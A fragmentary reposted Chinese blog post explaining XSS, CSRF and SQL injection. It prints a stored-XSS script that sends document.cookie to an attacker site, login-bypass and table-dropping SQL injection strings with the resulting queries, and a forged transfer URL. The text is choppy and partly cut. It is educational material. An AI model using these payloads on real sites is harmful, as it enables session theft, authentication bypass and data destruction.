标签:需要 请求 流量 md5 网站 发送 服务 用户操作 二次
- XSS(跨站脚本攻击)
- CSRF(跨站请求伪造)
- SQL注入
- 总结几种常见web攻击手段极其防御方式
<script>window.open(“www.gongji.com?param=”+document.cookie)</script>
,如果我没有对他的内容进行处理,直接存储到数据库,那么下一次当其他用户访问他的这篇文章的时候,服务器从数据库读取后然后响应给客户端,浏览器执行了这段脚本,然后就把该用户的cookie发送到攻击者的服务器了。<script>
,应该只是字符串却有了代码的作用。‘ or ‘1‘= ‘1
。这是最常见的sql注入攻击,当我们输如用户名 jiajun ,然后密码输如‘or ‘1‘= ‘1
的时候,我们在查询用户名和密码是否正确的时候,本来要执行的是select * from user where username=‘‘ and password=‘‘
,经过参数拼接后,会执行sql语句 select * from user where username=‘jaijun‘ and password=‘ ‘ or ‘ 1‘=‘1 ‘
,这个时候1=1是成立,自然就跳过验证了。‘;drop table user;--
,那么sql命令为select * from user where username=‘jiajun‘ and password=‘‘;drop table user;--‘
这个时候我们就直接把这个表给删除了www.A.com/transfer?account=666&money=10000
,那么这个时候很可能我就向账号为666的人转了1w软妹币标签:需要 请求 流量 md5 网站 发送 服务 用户操作 二次
原文地址:http://www.cnblogs.com/whb11/p/7200897.html